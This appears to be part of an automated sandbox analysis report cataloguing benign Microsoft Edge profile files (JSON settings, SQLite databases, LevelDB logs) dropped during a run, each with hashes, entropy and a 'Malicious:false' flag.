                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):419
                                                                                                                                                                                                                                                                Entropy (8bit):5.2503523429778385
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:7HMyvBYebvqBZFUt8OKZ/+OAR56YebvqBaJ:7HMYBYebvyg8OuAD6YebvL
                                                                                                                                                                                                                                                                MD5:C791D992518D2E2DA6B30A9C86B0571C
                                                                                                                                                                                                                                                                SHA1:FB84B3D049ED829A01BA7494E06018AA6998C4F6
                                                                                                                                                                                                                                                                SHA-256:C2F0E0AE40537BC779563E0C49D3283F2A3466DD2C61F5EDEEC16E5FBC277AC1
                                                                                                                                                                                                                                                                SHA-512:B54CF3F210FA3E41BC6CE353636D8FFC567CD2CB916596F7DF7FF26932145730E7401C1ED4F42D6A2EBBDC880B211CE8E28B7976EC6A3220EEE313DF38B3AE41
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:28.195 fe0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/16-07:47:28.197 fe0 Recovering log #3.2024/12/16-07:47:28.201 fe0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                Entropy (8bit):5.254638798693241
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AFN+q2PCHhJ23oH+TcwtpIFUt8OA9cCWZmw+OA9cBVkwOCHhJ23oH+Tcwta/WLJ:78N+vBYebmFUt8O0W/+ODV56YebaUJ
                                                                                                                                                                                                                                                                MD5:E06B0675AF39720C05E37AAAD7069A03
                                                                                                                                                                                                                                                                SHA1:AE3553F6C48B7537AC97A8EC6522DACA810DFD27
                                                                                                                                                                                                                                                                SHA-256:CA37D5987FC328344F394122A64F8551A717EA8ECBCA383096E299B2DD90F75D
                                                                                                                                                                                                                                                                SHA-512:6B68B128A0BD9329FBC3B56AD7741BABAC15573786F4913FCD4425DB403817A00E12969F29D1D8DB37A7B49D6A65E235113B96E70F52AF7F4B6B417C3868D3EA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.493 16cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/16-07:47:09.676 16cc Recovering log #3.2024/12/16-07:47:09.676 16cc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                Entropy (8bit):1.2650735324923974
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:KrJ/2qOB1nxCkMCSAELyKOMq+8QTQKC+CVumG:K0q+n0JC9ELyKOMq+8Q75
                                                                                                                                                                                                                                                                MD5:DCE8F8413E31D6E7FFCD9F1910B32275
                                                                                                                                                                                                                                                                SHA1:19CD5493E33F7159DE9BAAA24591021CDE15E965
                                                                                                                                                                                                                                                                SHA-256:FE11A9E09F87E00E92AAE60F9A4176E7D43F3A6FDE732C79772EAD5FF077594E
                                                                                                                                                                                                                                                                SHA-512:4342E1A96B4778091BE412ABE8221042C5E0FC3282A222078CA4E92102C0ED9058310D98DCBFC503A54A527BDA7EAA6C22D532F1290BE73A3C4514B6DAF4EF5F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                Entropy (8bit):0.4667605445779214
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0iX:v7doKsKuKZKlZNmu46yjx0y
                                                                                                                                                                                                                                                                MD5:E882DD23D7C460005F9E7A93421FF272
                                                                                                                                                                                                                                                                SHA1:FBABF18D7EAD5C07EB7A1D44CCB75B7095FAC615
                                                                                                                                                                                                                                                                SHA-256:68649247C5ACABF7089F1F612CA90D2EF63F49E0AA46A9B4599C627AD4EB1A9B
                                                                                                                                                                                                                                                                SHA-512:B4081CED7B9EE3D10962FC85BCEDBB5AFB59DA1CBF796FD095542E065D075BC561D1DCC4F061D47E8160754D7D3ABEB527A54FA7A53E012113E93D0792213B4D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12824
                                                                                                                                                                                                                                                                Entropy (8bit):0.136412670299364
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:P9Nllv/etXlQJv9HE34//l/h4jRfn1d7jdtQfdlHvbkFlJXtXlQLkH:UlQhlo4puj3dndYlP4FtlQoH
                                                                                                                                                                                                                                                                MD5:399B05B0F4866EBA5A7B131AEC30E80B
                                                                                                                                                                                                                                                                SHA1:227901F1669AE3415382E885F137D2A9E908705C
                                                                                                                                                                                                                                                                SHA-256:D3788D69630188C5029CA1394E2511498FABD1794222ABA624A6E3B980BBB386
                                                                                                                                                                                                                                                                SHA-512:81C675A9CAB19B6768DF6F01A0CA7AB537B63DAFD4D2902BCCBC302EC9A7F6D455EC1477B34480C41D3EC548633CD2275BA420685D6464AF558FB4214C0A752A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11755
                                                                                                                                                                                                                                                                Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):40504
                                                                                                                                                                                                                                                                Entropy (8bit):5.561177469368286
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:lIZM6H7pLGLhYqWPwufOS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVQZMDUgIrw1VOOl:lIZM6BchYqWPwufOSu1ja9ZM4gZ1VOLs
                                                                                                                                                                                                                                                                MD5:CD41E63E5A95E64371764794D409D051
                                                                                                                                                                                                                                                                SHA1:170114D777207188170F4862AC772259290936D3
                                                                                                                                                                                                                                                                SHA-256:3F4ECE4A134DF4D15E8891D05991E0808962233C0D46B036EDEC3D3EBE81D27C
                                                                                                                                                                                                                                                                SHA-512:AC105FFEB1ADE575D302147F8A83E5771F39AA9AB6D6AD47552B92E1D37D4F0983BFCA61B9E1E63D11F6ECD558642BCA47387841FF7CAF8AB7113C2D3F61DD3A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378826829511448","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378826829511448","location":5,"ma
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                                Entropy (8bit):5.567227888340905
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:llvMcqWPwufTS8F1+UoAYDCx9Tuqh0VfUC9xbog/OVWDULIrwgpXtun:llvMcqWPwufTSu1jaP4LZgtE
                                                                                                                                                                                                                                                                MD5:9ED3060A9F39B28EF4CB707645732673
                                                                                                                                                                                                                                                                SHA1:48B40BE9DCB688E3BB3E8BA0945C9268A8231672
                                                                                                                                                                                                                                                                SHA-256:78237730668568C717C167CD7A6ED23E050EBDC52C5A3304CE7FBF6C529D39A6
                                                                                                                                                                                                                                                                SHA-512:B193E592E0F6800008F6545C44CC15A59DAE5818FCD4C7B260B92DB3BA69A924B7CA081D86EFF88BB87E2CD22E228CDA5090B04C6241D1E0D7CEA0FAA4CD9F17
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378826829511448","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378826829511448","location":5,"ma
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17193), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):17199
                                                                                                                                                                                                                                                                Entropy (8bit):5.498147058444482
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:st5PGQSu4Cs4ZXV+Vl1xSqDQ3iQrTebGCQwX37NIl:s7OXuxZwnCX3TGbGx6i
                                                                                                                                                                                                                                                                MD5:0E84AE660086157F5445ED108C11023F
                                                                                                                                                                                                                                                                SHA1:88BA1C64AEEEBCD4D58F16E44C9D4884D684EBF0
                                                                                                                                                                                                                                                                SHA-256:928635375E71FD137781484FA01D8D6F52FA08F9A67C6AA1B2BF4EE8FA280611
                                                                                                                                                                                                                                                                SHA-512:2565441AF62BB50D513897E670D9C126FCC4AB3589413B25E7765143DF5C61A347BFEDDFEB0B40C6876016D836153615185FA14CE393BD15F7A3AA583491F3C9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378826830031057","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                Entropy (8bit):0.10183417230719521
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Gu09s809sq89XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl0:+qdqqspEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                                                                                                                MD5:138829710F92125DABC4F86A0F720B60
                                                                                                                                                                                                                                                                SHA1:E94234025A7DF8F2A53F78AC0ECD438CA01B604D
                                                                                                                                                                                                                                                                SHA-256:D245280C8EBFD83F46A7EF5252B279342753EDE6C6E430F6D1FA76A164344769
                                                                                                                                                                                                                                                                SHA-512:61AF5D4C404E9A487660E11A83FF7D837BFCDDA2190A13632D5D8E31A5FEDE020A58CB828F4CBCC19D4FB1D7B77467FD71DF9A8F054E03750EB964E98B79D9B4
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):317272
                                                                                                                                                                                                                                                                Entropy (8bit):0.8893485824905389
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:S4VR8RpRP+pRLmURdxFRcWpuRn6yCRObPRQfuRl6t1tRzyv8cyFy6wyQym+y/xya:NROT
                                                                                                                                                                                                                                                                MD5:0153871C0ACAB581F19FAEC16C416200
                                                                                                                                                                                                                                                                SHA1:858C2A41EA31B303DDC76A76ECE3D74896AB968F
                                                                                                                                                                                                                                                                SHA-256:8FA1B7EA957AC651724F612E919FD0A6923977AF2799EC62055478BA967EF46E
                                                                                                                                                                                                                                                                SHA-512:1E9F61852C8EA4E263B33EA4DF7D70C3B2C797ABCF956BF265A636187716765B19770C41A59718927129187F6E664DACCA79A0DFD1A353EA9237F54AE358AAB4
